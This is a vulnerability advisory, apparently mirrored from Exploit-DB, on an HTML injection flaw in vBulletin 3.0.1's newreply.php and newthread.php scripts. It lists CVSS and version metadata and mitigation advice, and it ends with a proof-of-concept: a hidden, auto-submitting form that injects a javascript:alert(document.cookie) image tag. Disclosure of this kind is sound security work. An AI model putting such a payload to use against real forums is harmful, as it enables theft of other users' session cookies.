HTML Injection Vulnerability in VBulletin

vendor:

VBulletin

by:

5.5

CVSS

MEDIUM

HTML Injection

CWE

Product Name: VBulletin

Affected Version From: 3.0.1

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:vbulletin:vbulletin:3.0.1

Metasploit:

Other Scripts:

Platforms Tested:

HTML Injection Vulnerability in VBulletin

The 'newreply.php' and 'newthread.php' scripts in VBulletin are prone to an HTML injection vulnerability. An attacker can inject malicious HTML and script code in fields that are viewable by other users. This can lead to theft of cookie-based authentication credentials and other attacks.

Mitigation:

Upgrade to a version that has patched this vulnerability. Review and sanitize user input to prevent HTML injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10602/info

VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts.

An attacker may exploit this issue by including hostile HTML and script code in fields that may be viewable by other users, potentially allowing for theft of cookie-based authentication credentials and other attacks.

This issue is reported to affect VBulletin version 3.0.1, however, it is likely that other versions are affected as well.

<form action="http://www.example.com/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;